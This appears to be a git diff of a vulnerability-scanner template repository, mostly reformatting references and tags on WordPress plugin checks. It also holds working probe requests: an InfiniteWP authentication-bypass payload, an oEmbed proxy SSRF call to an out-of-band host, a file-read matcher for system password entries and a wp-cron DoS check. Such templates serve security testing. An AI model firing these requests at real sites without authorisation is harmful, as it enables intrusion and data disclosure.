severity: info description: Searches for sensitive directories present in the elementor wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6297 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6297 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-emergency-script.yaml b/vulnerabilities/wordpress/wordpress-emergency-script.yaml index b575cc4a57..112f406c86 100644 --- a/vulnerabilities/wordpress/wordpress-emergency-script.yaml +++ b/vulnerabilities/wordpress/wordpress-emergency-script.yaml @@ -4,8 +4,9 @@ info: name: WordPress Emergency Script author: dwisiswant0 severity: info + reference: + - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script tags: wordpress - reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-git-config.yaml b/vulnerabilities/wordpress/wordpress-git-config.yaml index 623ab5f4aa..0373acfeb3 100644 --- a/vulnerabilities/wordpress/wordpress-git-config.yaml +++ b/vulnerabilities/wordpress/wordpress-git-config.yaml @@ -5,7 +5,8 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: https://hackerone.com/reports/248693 + reference: + - https://hackerone.com/reports/248693 tags: config,git,exposure,wordpress,wp-plugin,wp-theme requests: diff --git a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml index b8dae0946e..10e417ba5c 100644 --- a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the gtranslate wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6160 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index ab2d3656d9..df56152a95 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -4,7 +4,15 @@ info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner + to manage unlimited WordPress sites from their own server. + reference: + - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + - https://wordpress.org/plugins/iwp-client/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. tags: wordpress,auth-bypass,wp-plugin requests: @@ -21,7 +29,7 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} + _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} redirects: true extractors: @@ -55,4 +63,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 60be402e20..d4a0254656 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -4,10 +4,11 @@ info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha severity: critical - reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce,intrusive + reference: + - https://wpscan.com/vulnerability/10192 + tags: wordpress,wp-plugin,rce,intrusive,upload,python requests: - raw: diff --git a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml index dfad16747a..5c849255aa 100644 --- a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: info description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6436 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml new file mode 100644 index 0000000000..6e0733ca6e --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -0,0 +1,21 @@ +id: wordpress-ssrf-oembed + +info: + name: Wordpress Oembed Proxy SSRF + author: dhiyaneshDk + severity: medium + reference: + - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress + - https://github.com/incogbyte/quickpress/blob/master/core/req.go + tags: wordpress,ssrf,oast,proxy + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml index 3309a80e9e..6dd3f645af 100644 --- a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -4,7 +4,8 @@ info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/49252 + reference: + - https://www.exploit-db.com/exploits/49252 tags: wordpress,wp-plugin requests: diff --git a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index 90f297f2fa..844fa85bbc 100644 --- a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -4,7 +4,8 @@ info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6437 + reference: + - https://www.exploit-db.com/ghdb/6437 tags: wordpress,wp-plugin requests: diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index a1f28d4054..b42a797679 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the woocommerce wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6192 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing,plugin,woocommerce requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index f3efbb1457..8a96cfe510 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -1,13 +1,19 @@ id: wordpress-woocommerce-sqli info: - name: Unauthenticated SQL injection Woocommerce + name: Woocommerce Unauthenticated SQL Injection author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - tags: wordpress,woocomernce,sqli,wp-plugin + description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx + - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-89 + tags: wordpress,woocommerce,sqli,wp-plugin,injection requests: - method: GET @@ -32,4 +38,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index 28476103e4..05bc6af882 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -1,6 +1,7 @@ id: wordpress-wordfence-lfi + info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval author: 0x_Akoko severity: high reference: @@ -18,7 +19,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index cc1ca1e573..b0a50a1cfe 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -1,11 +1,12 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - tags: wordpress,wordfence,xss + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 + tags: wordpress,wordfence,xss,bypass requests: - method: GET @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index f005ff8557..5ada86210a 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - tags: wordpress,wp-plugin,xss + tags: wordpress,wp-plugin,xss,wordfence requests: - method: GET @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wordpress-wp-cron.yaml b/vulnerabilities/wordpress/wordpress-wp-cron.yaml new file mode 100644 index 0000000000..2046c2e65c --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-wp-cron.yaml @@ -0,0 +1,37 @@ +id: wordpress-wp-cron + +info: + name: Wordpress wp-cron.php DOS + author: pathtaga + severity: info + description: When this file is accessed a heavy MySQL query is performed, so it could be used by attackers to cause a DoS. + reference: + - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress + - https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30 + tags: wordpress,cron,wp,dos + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-cron.php" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - (regex("]+s\d+\.wp\.com",body_1)) + - (regex("